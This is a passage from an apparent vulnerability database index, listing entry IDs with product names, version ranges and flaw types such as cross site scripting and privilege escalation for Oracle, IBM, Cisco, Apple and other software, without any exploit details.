11.1.1.7.0/11.1.1.9.0 Web Service API information disclosure [108076] Oracle Access Manager 11.1.2.3.0 Web Server Plugin information disclosure [108075] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Content Server privilege escalation [108072] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web General privilege escalation [108063] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS Security privilege escalation [108046] Oracle Knowledge Management up to 12.2.7 User Interface privilege escalation [108045] Oracle Knowledge Management up to 12.2.7 User Interface privilege escalation [108032] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 libcurl information disclosure [108031] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Postgresql race condition [108030] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Wireshark denial of service [108029] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 file denial of service [108026] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Gson privilege escalation [108023] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Kerberos Numeric Error [108022] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Xalan privilege escalation [108021] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 BeanUtils privilege escalation [108017] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 OpenSSL weak encryption [108016] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Spring cross site request forgery [108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections privilege escalation [108014] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 glibc Ghost memory corruption [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy privilege escalation [107816] QEMU up to 2.10.0 io/channel-websock.c denial of service [107607] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 HTTP Response Splitting cross site scripting [107499] IniNet Webserver up to 2.02 weak authentication [107488] Cisco Unified Communications Manager Web UI cross site scripting [107487] Cisco WebEx Meetings Server cross site scripting [107416] Gemalto HASP SRM/Sentinel HASP/Sentinel LDK up to 7.54 Admin Interface privilege escalation [107410] IBM WebSphere Message Broker 9.0/10.0 information disclosure [107378] IBM WebSphere Commerce 7.0/8.0 Marketing ESpot denial of service [107352] Schneider Electric InduSoft Web Studio/InTouch Machine Edition up to 8.0 SP2 weak authentication [107222] IBM WebSphere DataPower up to 7.6 Web UI cross site scripting [107221] IBM WebSphere Portal 7.0/8.0/8.5/9.0 directory traversal [107169] IBM Business Process Manager 7.5/8.0/8.5 Web UI cross site scripting [107168] IBM Business Process Manager 7.5/8.0/8.5 Web UI cross site scripting [107160] Citrix Netscaler Application Delivery Controller up to <=10.0 Management Interface privilege escalation [107159] IBM Business Process Manager 8.0.1.1/8.5.7 Web UI cross site scripting [107145] Schneider Electric U.motion Builder up to 1.2.1 Web Service weak authentication [107114] IBM Business Process Manager 8.5.7 Web UI cross site scripting [107109] IBM WebSphere MQ 8.0 privilege escalation [107097] Zope/Plone Management Interface cross site request forgery [107013] Trend Micro Web Security 6.5 Web Service Inspection privilege escalation [107010] EMC ViPR SRM/Storage M/R/VNX M/R/M/R Webservice Gateway directory traversal [106910] Watchguard Firewall up to 11.x XML-RPC Interface denial of service [106909] Watchguard Firewall up to 11.x XML-RPC Interface cross site scripting [106853] SAP NetWeaver AS JAVA up to 7.5 Host Control Web Service denial of service [106843] Ruby up to 2.2.8/2.3.4/2.4.0 WEBrick Library weak authentication [106831] Cisco Cloud Web Security up to 3.0.1.6 Filter memory corruption [106685] webapp-builder 2.0 on WordPress Invedion CMS Unlicensed privilege escalation [106567] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/wandetect.php cross site scripting [106565] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/shareport.php cross site scripting [106564] D-Link DIR-850L up to FW114WWb07_h2ab_beta1 htdocs/web/wpsacts.php cross site scripting [106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [106419] Jenkins up to 1.585 on Tomcat Session Cookie WebAppMain.java' 7PK Security Features [106418] Jenkins up to 1.585 on Tomcat Session Cookie WebAppMain.java' Flag 7PK Security Features [106214] Cisco Unity Connection 10.5(2) Web Framework Reflected cross site scripting [106212] IBM Emptoris Supplier Lifecycle Management 10.1.0.x Web UI cross site scripting [106181] T&W WIFI Repeater BE126 cgi-bin/webupg privilege escalation [106175] Mongoose Web Server up to 6.8 _mg_admin cross site request forgery [106169] IBM WebSphere Portal 6.1/7.0/8.0 cross site scripting [106130] IBM QRadar Network Security 5.4 Web UI cross site scripting [106113] Palo Alto PAN-OS up to 6.1.17/7.0.16/7.1.11/8.0.2 GlobalProtect Interface cross site scripting [105990] Advantech WebAccess up to 8.2 sql injection [105989] Advantech WebAccess up to 8.2 memory corruption [105988] Advantech WebAccess up to 8.2 memory corruption [105987] Advantech WebAccess up to 8.2 memory corruption [105986] Advantech WebAccess up to 8.2 Format String [105985] Advantech WebAccess up to 8.2 weak authentication [105956] IBM Cognos Analytics 11.0 Web UI cross site scripting [105955] IBM Cognos Analytics 11.0 Web UI cross site scripting [105953] IBM Cognos Analytics 11.0 Web UI cross site scripting [105852] Webcalendar up to 1.2.7 directory traversal [105851] Webcalendar up to 1.2.7 cross site scripting [105836] IBM Curam Social Program Management 6.0/6.1/6.2/7.0 Web UI cross site scripting [105759] OSIsoft PI Web API up to 1.8.x cross site request forgery [105750] SpiderControl SCADA Web Server directory traversal [105619] Web-Dorado Photo Gallery by WD - Responsive Photo Gallery up to 1.3.50 on WordPress photo-gallery.php bwg_edit_tag sql injection [105470] IBM WebSphere Application Server 8.0/8.5/9.0 Web Services Security information disclosure [105422] Cisco Web Security Appliance SNMP Polling information disclosure [105394] Cisco AnyConnect Secure Mobility Client WebLaunch cross site scripting [105213] IBM InfoSphere Streams 4.0/4.1/4.2 Web UI cross site scripting [105152] IBM Emptoris Supplier Lifecycle Management 10.0.x/10.1.x Web UI cross site scripting [105127] Express Web Framework up to 3.10/4.4 on Node.js 400 Level Response cross site scripting [104993] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x privilege escalation [104904] Cisco Unified Communications Manager 11.5(1.10000.6) Web Framework directory traversal [104902] Cisco Prime Collaboration Provisioning Tool up to 12.2 Web UI cross site request forgery [104812] IBM WebSphere Application Server 9.0.0.4 PasswordUtil 7PK Security Features [104811] IBM iNotes 8.5/9.0 Web UI cross site scripting [104808] IBM Infosphere Master Data Management Server up to 11.6 Web UI cross site scripting [104749] IBM WebSphere MQ Internet Pass-Thru 2.0/2.1 MQIPT Stop 7PK Security Features [104711] IBM Sterling B2B Integrator Standard Edition 5.2.x Web UI cross site scripting [104675] IBM InfoSphere Master Data Management up to 11.6 Web UI cross site scripting [104672] IBM Infosphere Master Data Management Server 11.0/11.3/11.4/11.5/11.6 Web UI cross site scripting [104470] Cisco Cloud Web Security Alert Service cross site scripting [104460] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting [104455] IBM Emptoris Supplier Lifecycle Management 10.1.0.x Web UI cross site scripting [104382] Palo Alto PAN-OS up to 6.1.17/7.0.15/7.1.10/8.0.2 GlobalProtect External Interface cross site scripting [104331] Cisco Prime Collaboration Provisioning Tool 12.1 Web Portal cross site scripting [104330] Cisco Web Security Appliance 9.0.0-485/10.1.0-204 Web Proxy ACL privilege escalation [104329] Cisco Web Security Appliance 10.1.0-204 Web GUI Credentials privilege escalation [104328] Cisco Web Security Appliance 10.1.0-204 cross site scripting [104285] Apple iCloud up to 6.2.1 on Windows WebKit Web Inspector memory corruption [104284] Apple iCloud up to 6.2.1 on Windows WebKit Page Loading memory corruption [104282] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104281] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104280] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104279] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104278] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104277] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104276] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104275] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104274] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104273] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104272] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104271] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104270] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104269] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104268] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104267] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104266] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104200] Apple tvOS up to 10.2.1 WebKit Page Loading memory corruption [104199] Apple tvOS up to 10.2.1 WebKit memory corruption [104198] Apple tvOS up to 10.2.1 WebKit cross site scripting [104197] Apple tvOS up to 10.2.1 WebKit cross site scripting [104196] Apple tvOS up to 10.2.1 WebKit memory corruption [104195] Apple tvOS up to 10.2.1 WebKit memory corruption [104194] Apple tvOS up to 10.2.1 WebKit memory corruption [104193] Apple tvOS up to 10.2.1 WebKit memory corruption [104192] Apple tvOS up to 10.2.1 WebKit memory corruption [104191] Apple tvOS up to 10.2.1 WebKit memory corruption [104190] Apple tvOS up to 10.2.1 WebKit memory corruption [104189] Apple tvOS up to 10.2.1 WebKit memory corruption [104188] Apple tvOS up to 10.2.1 WebKit memory corruption [104187] Apple tvOS up to 10.2.1 WebKit memory corruption [104186] Apple tvOS up to 10.2.1 WebKit memory corruption [104185] Apple tvOS up to 10.2.1 WebKit memory corruption [104184] Apple tvOS up to 10.2.1 WebKit memory corruption [104183] Apple tvOS up to 10.2.1 WebKit memory corruption [104182] Apple tvOS up to 10.2.1 WebKit memory corruption [104181] Apple tvOS up to 10.2.1 WebKit memory corruption [104180] Apple tvOS up to 10.2.1 WebKit 7PK Time and State [104094] IBM Tivoli Endpoint Manager Web UI Lifecycle/Power/Patch cross site scripting [104001] Oracle up to 16.2 Web Access privilege escalation [103999] Oracle 8.3/8.4/15.1/15.2/16.1 Web Access privilege escalation [103998] Oracle up to 16.2 Web Access privilege escalation [103997] Oracle 15.1/15.2/16.1/16.2 Web Access privilege escalation [103950] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x General privilege escalation [103949] Oracle Hospitality Suite8 8.10.x WebConnect privilege escalation [103945] Oracle Hospitality Suite8 8.10.x WebConnect privilege escalation [103944] Oracle Hospitality Property Interfaces 8.10.x Parser privilege escalation [103938] Oracle Hospitality WebSuite8 Cloud Service 8.9.6/8.10.x privilege escalation [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver information disclosure [103861] Oracle Agile PLM 9.3.5/9.3.6 Web Client privilege escalation [103828] Oracle WebLogic Server 12.1.3.0 Web Container privilege escalation [103827] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Web Services privilege escalation [103826] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Core Components privilege escalation [103821] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Web Container privilege escalation [103819] Oracle Business Intelligence Enterprise Edition 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Analytics Web Administration privilege escalation [103814] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Web Server privilege escalation [103812] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Content Server privilege escalation [103811] Oracle WebCenter Content 11.1.1.9.0/12.2.1.1.0 Content Server privilege escalation [103807] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0 Web Server privilege escalation [103806] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation [103805] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation [103804] Oracle BI Publisher 11.1.1.7.0 Web Server privilege escalation [103799] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 privilege escalation [103789] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.1/12.2.1.2 Struts 2 privilege escalation [103786] Oracle WebLogic Server 10.3.6.0/12.1.3.0 JNDI privilege escalation [103771] cPanel up to <=56.0.50 WHM Upload Locale Interface cross site scripting [103714] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation [103713] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation [103696] Cisco WebEx Browser Extension up to 1.0.11 on Chrome/Firefox memory corruption [103595] Oracle GlassFish Server Open Source Edition 3.0.1 Build 22 Administration Interface Credentials weak authentication [103550] EMC ViPR SRM up to 4.0 Webservice Gateway/RMI JMX weak authentication [103529] Juniper ScreenOS Web UI cross site scripting [103528] Juniper ScreenOS Web UI cross site scripting [103527] Juniper ScreenOS Web UI cross site scripting [103526] Juniper ScreenOS Web UI cross site scripting [103525] Juniper ScreenOS Web UI cross site scripting [103481] IBM WebSphere MQ 9.0.1/9.0.2 Message privilege escalation [103395] Cisco Identity Services Engine 2.1(102.101)/2.2(0.283)/2.3(0.151) Web-UI Stored cross site scripting [103385] IBM WebSphere Commerce 6.0/7.0/8.0 Redirect [103384] IBM WebSphere MQ 9.0.1/9.0.2 Java JMS Application Credentials privilege escalation [103285] Yaws Web Server 1.91 Port 8080 Service directory traversal [103278] IBM WebSphere MQ 9.0.2 Channel Status privilege escalation [103132] IBM Security Guardium 10.0/10.1 Web UI cross site scripting [103129] IBM Maximo Asset Management 7.1/7.5/7.6 Web UI cross site scripting [103122] IBM Jazz Reporting Service 5.0/6.0 Web UI cross site scripting [103058] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting [103057] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting [103056] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting [103055] IBM Jazz Foundation Reporting Service 5.0/6.0 Web UI cross site scripting [103026] Cisco Prime Infrastructure Web Framework cross site scripting [103025] Cisco Prime Infrastructure 3.1(0.0) Web Framework cross site scripting [103022] Cisco FirePOWER Management Center 6.0.1.3/6.2.1 Web Framework cross site scripting [103021] Cisco FirePOWER Management Center up to 5.4.1.6 Web Framework Stored cross site scripting [103020] Cisco FirePOWER Management Center up to 5.4.1.6 Web Framework cross site scripting [103017] Cisco Prime Collaboration Provisioning 12.1 Web Application File directory traversal [103016] Cisco Prime Collaboration Provisioning 12.1 Web Application Hijacking weak authentication [103011] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) SQL Database Interface sql injection [103008] Webmin 1.840 acl/save_user.cgi cross site scripting [103007] Webmin 1.840 change_referers.cgi cross site scripting [103006] Webmin 1.840 man/view_man.cgi cross site scripting [103002] Request Tracker up to 4.0.24/4.2.13/4.4.1 Dashboard Subscription Interface privilege escalation [102942] Schneider Electric Modicon M241/Modicon M251 up to 4.0.5.10 Web Application Random weak encryption [102901] IBM WebSphere Portal 8.5/9.0 cross site scripting [102900] IBM Curam Social Program Management 5.2/6.0/7.0 Web UI cross site scripting [102892] FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 libavcodec/webp.c vp8_decode_mb_row_no_filter/pred8x8_128_dc_8_c memory corruption [102860] IBM QRadar 7.2/7.3 Web UI cross site scripting [102803] Cisco Prime Infrastructure/Evolved Programmable Network Web UI XML External Entity [102786] Boa Webserver 0.94.14rc21 GET /cgi-bin/wapopen directory traversal [102777] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting [102773] IBM Sterling B2B Integrator Standard Edition 5.2 Web UI cross site scripting [102764] Cisco WebEx Network Recording Player up to T29.13/T30.16/T31.9 ARF File memory corruption [102732] Trihedral VTScada up to 11.2.25 Web Server File information disclosure [102725] IBM WebSphere MQ 8.0/9.0 MQXR Channel privilege escalation [102563] Webhammer WP Custom Fields Search Plugin 0.3.28 on WordPress cross site scripting [102341] IBM Jazz Foundation Web UI cross site scripting [102280] Cisco Unified Communications Domain Manager 8.1(7)ER1 Web-based GUI Redirect [102279] Cisco Unified Communications Domain Manager 8.1(7)ER1 Web-based GUI sql injection [102258] Cloud Foundry JSON Web Token Library privilege escalation [102150] IBM Business Process Manager 8.0/8.5 Web UI cross site scripting [102148] IBM WebSphere Application Server SOAP Request information disclosure [102064] ARM Trusted Firmware up to 1.3 Debug Interface privilege escalation [102051] IBM Security Access Manager for Web 9.0.0 privilege escalation [102050] IBM Security Access Manager for Web 9.0.0 weak encryption [101866] Juniper Junos Space up to 16.1 Administrative Interface Reflected cross site scripting [101803] Netgear WNR2000 Administration Webapp memory corruption [101799] IBM iNotes 8.5/9.0 Web UI cross site scripting [101746] Trend Micro ServerProtect for Linux 3.0 Web-based Management Console privilege escalation [101618] IBM Tivoli Federated Identity Manager 6.2 Web UI cross site scripting [101613] IBM Distributed Marketing/Marketing Platform 8.6/9.0/9.1/10.0 Web Application privilege escalation [101498] 3S-Smart CODESYS Web Server up to 2.3 File Upload privilege escalation [101497] 3S-Smart CODESYS Web Server up to 2.3 XML memory corruption [101476] Cisco TelePresence IX5000 8.2.0 Web Framework directory traversal [101439] McAfee Network Data Loss Prevention 9.3.x Web Server HTTP Method information disclosure [101356] Apple iCloud up to 6.2.0 on Windows WebKit memory corruption [101329] Apple watchOS up to 3.2.1 WebKit JSObject::ensureLength memory corruption [101316] Apple tvOS up to 10.2.0 WebKit Universal cross site scripting [101315] Apple tvOS up to 10.2.0 WebKit memory corruption [101314] Apple tvOS up to 10.2.0 WebKit memory corruption [101313] Apple tvOS up to 10.2.0 WebKit memory corruption [101312] Apple tvOS up to 10.2.0 WebKit memory corruption [101311] Apple tvOS up to 10.2.0 WebKit memory corruption [101310] Apple tvOS up to 10.2.0 WebKit memory corruption [101309] Apple tvOS up to 10.2.0 WebKit JSObject::ensureLength memory corruption [101308] Apple tvOS up to 10.2.0 WebKit memory corruption [101307] Apple tvOS up to 10.2.0 WebKit privilege escalation [101306] Apple tvOS up to 10.2.0 WebKit Universal cross site scripting [101086] Siemens SIMATIC WinCC up to V7.2 DCOM Interface privilege escalation [101063] IBM WebSphere Application Server 8.0/8.5.5 Admin Console privilege escalation [101059] IBM Rational Quality Manager Web UI cross site scripting [101056] IBM Cognos Analytics 11.0 Web UI cross site scripting [101055] Cisco WebEx Meetings Server 2.5/2.6/2.7/2.8 Meeting information disclosure [100917] Trend Micro OfficeScan up to 11.0 SP1/XG Blocked Website cross site scripting [100901] Advantech WebAccess up to 8.1 Absolute directory traversal [100890] IBM WebSphere Cast Iron 7.0.0/7.5.0.0 DNS/HTTP privilege escalation [100889] IBM WebSphere Cast Iron 7.0.0/7.5.0.0 XML External Entity [100836] Trend Micro OfficeScan up to 11/XG Web-Console Password privilege escalation [100824] IBM WebSphere Portal 8.5/9.0 privilege escalation [100802] Advantech WebAccess up to 8.1 upAdminPg.asp Password information disclosure [100720] Palo Alto PAN-OS up to 6.1.16/7.0.14/7.1.8/8.0.1 GlobalProtect External Interface User 7PK Security Features [100668] Webmin up to 1.829 cross site scripting [100650] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 cross site request forgery [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting [100565] CopySafe Web Protection Plugin up to 2.5 on WordPress cross site request forgery [100417] Palo Alto PAN-OS up to 7.0.14 GlobalProtect External Interface cross site scripting [100408] Cisco Prime Infrastructure 2.2(2) Web Framework cross site scripting [100395] IBM Curam Social Program Management 5.2/6.0/7.0 Web UI cross site scripting [100264] Drupal up to 8.2.7/8.3.0 RESTful Web Services privilege escalation [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) Data Processing Error [100147] Oracle up to 16.2 Web Access privilege escalation [100146] Oracle up to 16.2 Web Access privilege escalation [100143] Oracle up to 16.2 Web Access privilege escalation [100104] Oracle MICROS Relate CRM Software up to 15.0 Web Services memory corruption [100095] Oracle Hospitality OPERA 5 Property Services up to 5.5.1.x OXI Interface information disclosure [100026] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation [99994] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99993] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99991] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99990] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99989] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Catalog Mover privilege escalation [99988] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99987] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99986] Oracle WebLogic Server 12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Servlet Runtime privilege escalation [99984] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Web Services privilege escalation [99982] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99981] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Samples memory corruption [99980] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Catalog Mover privilege escalation [99979] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Advanced UI privilege escalation [99977] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation [99976] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Blob Server privilege escalation [99975] Oracle WebCenter Content 11.1.1.7/11.1.1.9/12.2.1.0/12.2.1.1/12.2.1.2 Content Server privilege escalation [99974] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation [99973] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation [99972] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Server privilege escalation [99970] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 privilege escalation [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat privilege escalation [99968] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1/12.2.1.2 Samples privilege escalation [99964] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Struts 2 privilege escalation [99927] IBM Financial Transaction Manager 3.0.0.x Web UI cross site scripting [99873] IBM Tivoli Application Dependency Discovery Manager 7.2.2/7.3 Web UI cross site scripting [99842] radare2 1.3.0 Web Assembly File wasm.c consume_init_expr memory corruption [99838] Moxa AWK-3131A Web Application information disclosure [99837] Moxa AWK-3131A 1.1 Web Application /forms/web_runScript denial of service [99836] Moxa AWK-3131A 1.1 Web Application information disclosure [99834] Moxa AWK-3131A 1.1 Web Application denial of service [99796] QEMU Human Monitor Interface memory corruption [99742] Unitrends Enterprise Backup up to 9.1.1 Web Server api/includes/users.php privilege escalation [99739] Unitrends Enterprise Backup up to 8.x Web Server privilege escalation [99732] Moxa AWK-3131A 1.1 Web Application cross site request forgery [99712] radare2 1.3.0 Web Assembly File libr/util/uleb128.c read_u32_leb128 memory corruption [99553] Cesanta MongooseOS/Mongoose Embedded Web Server Library mongoose.c mg_http_multipart_wait_for_boundary memory corruption [99483] Summer Baby Zoom Wifi Monitor / Internet Viewing System MySnapCam Web Service privilege escalation [99323] Trend Micro InterScan Web Security Virtual Appliance 6.5 cross site scripting [99322] Trend Micro InterScan Web Security Virtual Appliance 6.5 Key Management Error [99321] Trend Micro InterScan Web Security Virtual Appliance 6.5 FTP privilege escalation [99303] IBM Cognos Analytics 11.0 Web UI cross site scripting [99302] IBM Cognos Analytics 11.0 Web UI cross site scripting [99295] Horde Groupware Webmail Edition up to 5.2.17 Horde_Crypt privilege escalation [99294] Horde Groupware Webmail Edition up to 5.2.17 Horde_Crypt privilege escalation [99178] Huawei Tecal RHXXXX Web UI information disclosure [99140] IBM Kenexa LMS on Cloud up to 14.0.0 Web UI cross site scripting [99132] IBM Rational Quality Manager 4.0/5.0/6.0 Web UI cross site scripting [98990] IBM WebSphere Portal 8.5/9.0 Web UI cross site scripting [98986] IBM TRIRIGA 3.3/3.4/3.5 Web UI cross site scripting [98984] Revive Adserver up to 3.2.4/4.0.0 Web Installer Reflected cross site scripting [98973] ownCloud Server up to 9.0.3 WebDAV Copy privilege escalation [98969] Revive Adserver up to 3.2.2 Admin Interface cross site request forgery [98968] Revive Adserver up to 3.2.2 User Interface banner-acl.php` cross site request forgery [98967] Revive Adserver up to 3.2.2 User Interface Persistent cross site scripting [98964] Revive Adserver up to 3.2.2 User Interface campaign-zone.php Persistent cross site scripting [98903] Apple macOS Server up to 5.2 Web Server Timeout denial of service [98901] Apple tvOS up to 10.1 WebKit Universal cross site scripting [98900] Apple tvOS up to 10.1 WebKit Bound Information memory corruption [98899] Apple tvOS up to 10.1 WebKit Function.caller privilege escalation [98898] Apple tvOS up to 10.1 WebKit disconnectSubframes Universal cross site scripting [98897] Apple tvOS up to 10.1 WebKit privilege escalation [98896] Apple tvOS up to 10.1 WebKit denial of service [98895] Apple tvOS up to 10.1 WebKit privilege escalation [98894] Apple tvOS up to 10.1 WebKit memory corruption [98893] Apple tvOS up to 10.1 WebKit memory corruption [98892] Apple tvOS up to 10.1 WebKit memory corruption [98891] Apple tvOS up to 10.1 WebKit memory corruption [98890] Apple tvOS up to 10.1 WebKit memory corruption [98889] Apple tvOS up to 10.1 WebKit memory corruption [98888] Apple tvOS up to 10.1 WebKit memory corruption [98887] Apple tvOS up to 10.1 WebKit memory corruption [98886] Apple tvOS up to 10.1 WebKit memory corruption [98885] Apple tvOS up to 10.1 WebKit memory corruption [98884] Apple tvOS up to 10.1 WebKit memory corruption [98883] Apple tvOS up to 10.1 WebKit memory corruption [98882] Apple tvOS up to 10.1 WebKit memory corruption [98881] Apple tvOS up to 10.1 WebKit information disclosure [98880] Apple tvOS up to 10.1 WebKit memory corruption [98879] Apple tvOS up to 10.1 WebKit memory corruption [98878] Apple tvOS up to 10.1 WebKit privilege escalation [98845] Apple watchOS up to 3.1 WebKit memory corruption [98844] Apple watchOS up to 3.1 WebKit denial of service [98843] Apple watchOS up to 3.1 WebKit privilege escalation [98727] Apple macOS up to 10.12.3 WebKit constructJSReadableStreamDefaultReader memory corruption [98725] Apple macOS up to 10.12.3 WebKit Address privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98380] Cisco IOS XE 16.2.1 Web Framework privilege escalation [98310] IBM WebSphere MQ 8.0.0.6 Channel Agent denial of service [98261] Cisco Unified Communications Manager 11.5(1.11007.2) Web Framework cross site request forgery [98256] Cisco Web Security Appliance 8.5.3-069/9.1.1-074/9.1.2-010 URL Filter memory corruption [98251] Cisco WebEx Meetings Server 2.6 XML External Entity [98192] Cisco WebEx Meetings Server 2.5/2.6/2.7 weak authentication [98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure [98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption [98089] Microsoft Office Web Apps 2013 SP1 memory corruption [97929] Intel VirusScan Enterprise Linux up to 2.0.3 Webserver NailsConfig.html File privilege escalation [97900] IBM WebSphere Application Server 8.0/8.5/8.5.5/9.0 OIDC TAI privilege escalation [97880] Goahead Web Server mail.htm privilege escalation [97879] Goahead Web Server HTTP GET Request system.ini information disclosure [97823] Joomla CMS com_webgrouper sql injection [97737] CMS Made Simple 2.1.6 moduleinterface.php cross site scripting [97616] IBM QRadar 7.2 Web UI cross site scripting [97606] IBM QRadar 7.2 Web UI cross site scripting [97601] IBM WebSphere MQ 8.0 memory corruption [97574] qBittorrent up to 3.3.10 WebUI privilege escalation [97573] qBittorrent up to 3.3.10 WebUI cross site scripting [97365] Veritas NetBackup 6.x/7.x/8.0 Corba Interface privilege escalation [97296] IBM WebSphere MQ 8.0 MQ Clustering privilege escalation [97284] Plone up to 5.1a1 WebDAV Request privilege escalation [97223] IBM iNotes 8.5/9.0 Web UI cross site scripting [97212] IBM WebSphere MQ 8.0 Queue Manager privilege escalation [97211] IBM WebSphere MQ 8.0 Queue Manager privilege escalation [97209] IBM WebSphere MQ 8.0 information disclosure [97208] IBM WebSphere MQ 8.0 MQ Channel Data Processing Error [97202] Cisco FirePOWER Management Center 6.2.1 Web Framework cross site scripting [97193] Cisco Unified Communications Manager 11.5(1.11007.2) Web Framework information disclosure [97191] Cisco Unified Communications Manager 12.0(0.99999.2) Web Framework cross site scripting [97187] Cisco Email Security Appliance/Web Security Appliance 9.9.9-894/10.0.0-203/WSA10.0.0-233 MIME Scanner privilege escalation [97150] Apple tvOS up to 9.x WebKit memory corruption [97079] InterSect Alliance SNARE Epilog for UNIX 1.5 Web Admin 